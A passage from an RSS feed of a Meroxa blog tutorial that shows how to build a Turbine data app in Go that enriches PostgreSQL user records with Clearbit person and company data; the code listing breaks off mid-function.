&lt;/ul&gt;</content:encoded></item><item><title><![CDATA[Real-Time Data Enrichment for Data Activation Using Meroxa Turbine and Clearbit]]></title><description><![CDATA[By using Meroxa’s Turbine SDK, you can simplify the data activation process by reducing the need to use multiple point solutions for transformation and reverse ETL with code.]]></description><link>https://meroxa.com/blog/real-time-data-enrichment-for-data-activation-using-meroxa-turbine-and-clearbit</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-data-enrichment-for-data-activation-using-meroxa-turbine-and-clearbit</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Thu, 04 Aug 2022 16:44:20 GMT</pubDate><content:encoded>&lt;p&gt;Data activation, or reverse ETL, is the process of pulling data from your data warehouse and making it actionable by your business users in their preferred tooling. One of the main ingredients for data activation is data enrichment. Data enrichment enhances existing data by supplementing missing or incomplete data with information from internal or external sources.&lt;/p&gt;
&lt;p&gt;As seen in the diagram below, we see a typical architecture for data activation. Once a data record reaches the warehouse, a service acts upon that record, enriches it with data (internal or external), and places it in whatever destination a stakeholder needs.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Untitled%20(2).png&quot; alt=&quot;Untitled (2)&quot;&gt;&lt;/p&gt;
&lt;p&gt;The data activation pattern can be used for a number of use cases, including the following:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Service&lt;/strong&gt; - Gather customer details, support history, and purchase activity all in one place to provide a more tailored experience&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sales&lt;/strong&gt; - Access more detailed information about leads and their engagement activity can increase conversion and renewals&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Marketing&lt;/strong&gt; - Create personalized and targeted campaigns based on activity to improve lead generation efforts&lt;/p&gt;
&lt;h2&gt;Using Meroxa to Simplify and Turbocharge Data Activation&lt;/h2&gt;
&lt;p&gt;By using Meroxa’s &lt;a href=&quot;https://docs.meroxa.com/turbine/overview&quot;&gt;Turbine Application Framework&lt;/a&gt;, you can simplify the data activation process by reducing the need to use multiple point solutions for transformation and reverse ETL with code.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Untitled%20(3).png&quot; alt=&quot;Untitled (3)&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the above diagram, the Meroxa Turbine data app cleans and enriches events from various data sources in real time, so the data is already in a consumable format when it reaches the destination. This saves data-driven organizations considerable amounts of money, resources, and time.&lt;/p&gt;
&lt;h2&gt;Show Me the Code!&lt;/h2&gt;
&lt;p&gt;In this example, we use Go to pull records from a PostgreSQL database, enrich a record, and put it back into another table in the same PostgreSQL database. The destination can be any resource Meroxa officially supports, including Snowflake, S3, Salesforce, etc…&lt;/p&gt;
&lt;p&gt;💡 If you want to skip the tutorial to see the full example, check out the &lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/go/enrich&quot;&gt;Github repo&lt;/a&gt;.&lt;/p&gt;
&lt;h3&gt;Requirements&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup/&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://dashboard.clearbit.com/docs&quot;&gt;Clearbit API key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://go.dev/learn/&quot;&gt;Go&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Adding a PostgreSQL Resource to the Meroxa Catalog&lt;/h3&gt;
&lt;p&gt;The first step in creating a data app is to add the PostgreSQL resource to the Meroxa catalog. If your database supports logical replication, set the metadata configuration value to &lt;code class=&quot;language-text&quot;&gt;true&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;  --type postgres \\
  --url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \\
  --metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Initializing a Turbine Data App&lt;/h3&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init meroxa-clearbit &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; golang  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When you initialize the Turbine app, you’ll see we include a ton of comments and boilerplate to help you get up and going. We’ll be removing most of this for this example, but take a look around and even execute &lt;code class=&quot;language-text&quot;&gt;meroxa apps run&lt;/code&gt; to see the output of our sample app.&lt;/p&gt;
&lt;h3&gt;Clearbit Helper Function&lt;/h3&gt;
&lt;p&gt;The helper below uses the &lt;code class=&quot;language-text&quot;&gt;clearbit-go&lt;/code&gt; package to wrap a helper function around &lt;a href=&quot;https://dashboard.clearbit.com/docs#enrichment-api-combined-api&quot;&gt;Clearbit’s combined enrichment API&lt;/a&gt;. Essentially it takes an email address and returns details on the associated person &lt;em&gt;and&lt;/em&gt; company. The helper takes the result and returns a nicely formatted &lt;code class=&quot;language-text&quot;&gt;UserDetails&lt;/code&gt; struct.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; main
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;github.com/clearbit/clearbit-go/clearbit&quot;&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;log&quot;&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;os&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; UserDetails &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	FullName        &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Location        &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Role            &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Seniority       &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    Company         &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    GithubUser      &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;
    GithubFollowers &lt;span class=&quot;token builtin&quot;&gt;int&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;EnrichUserEmail&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;email &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;*&lt;/span&gt;UserDetails&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	key &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; os&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Getenv&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;CLEARBIT_API_KEY&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    client &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; clearbit&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewClient&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;clearbit&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;WithAPIKey&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;key&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    results&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; resp&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; client&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;FindCombined&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    	clearbit&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;PersonFindParams&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    		Email&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error looking up email; resp: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; resp&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Status&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&lt;/span&gt;UserDetails&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        FullName&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;        results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Name&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;FullName&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Location&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;        results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Location&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Role&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;            results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Employment&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Role&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Seniority&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;       results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Employment&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Seniority&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Company&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;         results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Company&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Name&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        GithubUser&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;      results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;GitHub&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Handle&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        GithubFollowers&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; results&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Person&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;GitHub&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Followers&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
   &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Modifying app.go&lt;/h3&gt;
&lt;p&gt;This section of the app defines the main topology of the Data App. Here you can see that we’re referencing a collection (or &lt;em&gt;table&lt;/em&gt;) called &lt;code class=&quot;language-text&quot;&gt;user_activity&lt;/code&gt; from a resource named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;. This is specifically a PostgreSQL database with a table called &lt;code class=&quot;language-text&quot;&gt;user_activity&lt;/code&gt; but Turbine (and the Meroxa platform) abstract that away so you only really need to worry about the name of the resource and the collection that you’re interested in accessing.&lt;/p&gt;
&lt;p&gt;We then &lt;em&gt;process&lt;/em&gt; that collection via &lt;code class=&quot;language-text&quot;&gt;EnrichUserData&lt;/code&gt; (detailed below) and ultimately output the results from &lt;code class=&quot;language-text&quot;&gt;db&lt;/code&gt; into a collection named &lt;code class=&quot;language-text&quot;&gt;user_activity_enriched&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In order to hit the Clearbit API, we have to provide an API Key. The &lt;code class=&quot;language-text&quot;&gt;RegisterSecret&lt;/code&gt; method makes that available to the function by mirroring the environment variable into the context of the function.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a App&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;v turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Turbine&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	db&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    stream&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_activity&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// stream is a collection of records, can&apos;t be inspected directly&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;RegisterSecret&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;CLEARBIT_API_KEY&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// makes env var available to data app&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    res&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;_&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; v&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;stream&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; EnrichUserData&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// function to be implemented&lt;/span&gt;
    
    err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;res&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_activity_enriched&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; err
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Enriching Data with Functions&lt;/h3&gt;
&lt;p&gt;Each record will be processed by the &lt;code class=&quot;language-text&quot;&gt;EnrichUserData&lt;/code&gt; function, as seen below. When the program is compiled, this function will be extracted via reflection. Meroxa will automatically create the &lt;a href=&quot;https://en.wikipedia.org/wiki/Directed_acyclic_graph&quot;&gt;DAG&lt;/a&gt; and orchestrate the data through each component(DB &gt; function &gt; DB).&lt;/p&gt;
&lt;p&gt;We included some additional magic on the &lt;code class=&quot;language-text&quot;&gt;Payload&lt;/code&gt; methods (&lt;a href=&quot;https://pkg.meroxa.io/github.com/meroxa/turbine-go#Payload&quot;&gt;more info here&lt;/a&gt;). The&lt;code class=&quot;language-text&quot;&gt;.Set&lt;/code&gt; method allows Turbine to modify the payload without having to worry about the underlying format or schema.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; EnrichUserData &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;f EnrichUserData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;Process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;stream &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; i&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;range&lt;/span&gt; stream &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Got email: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        UserDetails&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;EnrichUserEmail&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        
        &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error enriching user data: &quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
            &lt;span class=&quot;token keyword&quot;&gt;break&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
        
        log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;Got UserDetails: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;full_name&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;FullName&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        err &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; record&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Set&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; UserDetails&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Company&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
